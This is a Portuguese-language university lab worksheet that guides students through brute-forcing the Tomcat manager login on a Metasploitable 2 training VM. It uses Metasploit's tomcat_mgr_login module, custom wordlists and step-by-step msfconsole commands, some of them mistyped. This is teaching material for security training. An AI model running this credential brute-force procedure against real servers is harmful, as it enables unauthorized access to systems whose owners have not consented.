**ESQUEMA DE PLANO DE AULA PRÁTICA**

**TAREFA 6** "Metasploitable Tomcat"

Tópico no Moodle: “Teste de Invasão do Metasploitable Tomcat”

Data:   
  
Tempo de Aula: 1 hora-aula  
  
Grupo: <Aluno\_1> \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

<Aluno\_2> \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

**ASSUNTO**

**Nesta experiência, exploraremos como usar Metasploit para testar a segurança de um servidor Tomcat, usando o módulo gerenciador de login do Tomcat, visando descobrir o login de usuário e senha do servidor. Tomcat ou Apache Tomcat é um servidor web *open source* e um *servlet container* usado para rodar Java Servlets e Java Server Pages (JSP). Usaremos Metasploit no sentido de aplicar força bruta no login do Tomcat. O módulo Tomcat Manager Login do Metasploit será usado.**

**BIBLIOGRAFIA BÁSICA E INSTALAÇÕES**

Backtrack 5 Cookbook, Willie Pritchett & David De Smet, PACKT Publishing, 2012.

**REQUISITOS**

**Virtualbox   
  
Backtrack 5 VM**

**Metasploitable Linux 2 VM (Aplicação MySQL)**

------------------------------------------------------------------------------------------------------------------------------  
 **OBJETIVOS DA AULA**

Conhecer como quebrar “user-password” de um servidor de aplicações Tomcat, situada na VM Metasploitable 2.

Para tal serão fornecidos na VM Backtrack, no diretório /opt/metasploit/msf3data/wordlists/... dois arquivos chamados: tomcat\_mgr\_default\_pass.txt e tomcat\_mgr\_default\_users.txt

Criar e gravar o arquivo de senhas tomcat\_mgr\_default\_pass.txt neste diretório:

root@bt:/# nano tomcat\_mgr\_default\_pass.txt e preencher com senhas fictícias, como por exemplo: toor admin tomadmin e4UA ine5680 tomcat

Criar e gravar o arquivo de usuários tomcat\_mgr\_default\_users.txt neste diretório:

root@bt:/# nano tomcat\_mgr\_default\_users.txt e preencher com usuários fictícios, como por exemplo: admin bosco ine5680 tomcat ocsob root

**SELEÇÃO DE CONTEÚDO – A PRÁTICA**

Um conteúdo mínimo, consistindo de um roteiro de aula, com Metasploit Framework, visando o objetivo acima, pode ser colocada como:

**MOSTRE SEU EXPERIMENTO**

**Abra o Virtualbox.**

**Execute a VM Backtrack, Execute a VM Metasploitable.**

**VM Backtrack: root@bt:/# startx // Abre a interface grafica do Backtrack.**

**Obs: Se seu teclado não aceitar o símbolo “/” separador de diretórios e arquivos no Linux, use o seguinte comando no prompt do seu Linux:**

**$setxkbmap -model abnt2 -layout br**

**No símbolo Application Launcher (canto esquerdo, embaixo da interface grafica), veja o Menu Application Launcher:**

**Escolha Backtrack -> Exploitation Tools -> Network Exploitation Tools -> Metasploit Framework -> ……. > msfconsole**

**msf> msfconsole // Lanca o MSFCONSOLE**

**msf> search tomcat // Busca todas as vulnerabilidades do MySQL**

**msf> use auxiliary/scanner/http/tomcat\_mgr\_login // escolhida a vulnerabilidade   
 Tomcat Login Utility,**

**// surge novo prompt**

**msf auxiliary(tomcat\_mgr\_login)> show options**

**// mostra opções disponíveis do módulo. Note que temos uma porção de itens que são estabelecidos como YES e são requeridos . Utilizaremos seus defaults.**

**// Estabeleça seu arquivo de senha (PASS\_FILE):**

**// Indica o arquivo de senhas e sua localização**

**PASS\_FILE mset**

**/opt/metasploit/msf3/data/wordlists/tomcat\_mgr\_default\_pass.txt**

**// Estabeleça seu arquivo de usuários (USER\_FILE)**

**// Indica o arquivo de usuários e sua localização**

**USER\_FILE mset**

**/opt/metasploit/msf3/data/wordlists/tomcat\_mgr\_default\_users.txt**

**// Estaleleça a VM alvo, neste caso, uma VM Metasploitable 2, um host remoto.**

**set RHOSTS 192.168.1.114 // VM Metasploitable 2**

**// Estabelece porta no RHOSTS**

**set RPORT 8180**

**// Executa o exploit**

**exploit**

**Metasploit tenta fazer combinações de todos os *usernames* e *passwords* contidos em ambos os arquivos.**

**Localize o “+” à esquerda da linha em que Metasploit combina login e password que funciona. Veja o resultado na saída dada pelo Metasploit.**

**Qual foi o seu resultado encontrado nesta experiência ?**

**Resposta:**

**CONCLUSÃO**

**Nesta prática, customizamos duas listas-dicionário de usuários e senhas para Tomcat Server. Usamos o Metasploit’ MSFCONSOLE para explorar uma vulnerabilidades Tomcat, sobre a VM Metasploitable. Começamos lançando o console e buscando todas as vulnerabilidades Tomcat.**

**Após escolhermos a vulnerabilidade Tomcat\_Login, estabelecemos suas opções e executamos o exploit. Usando os arquivos de usernames e passwords supridos por nós mesmos. O Metasploit tenta aplicar força bruta à base de dados Tomcat.**

**Neste exemplo, usamos arquivos de usernames e passwords customizados, que inventamos, mas existem alguns modos de gerar arquivos com lista de palavras de usernames e arquivos de senhas. Um destes métodos e o usado pela ferramenta *Crunch* ou o método de usar *Rainbow Tables*, que são tabelas de dicionário especiais que usam valores *hash* ao invés de senhas de dicionário padrão para alcançar o ataque por força-bruta.**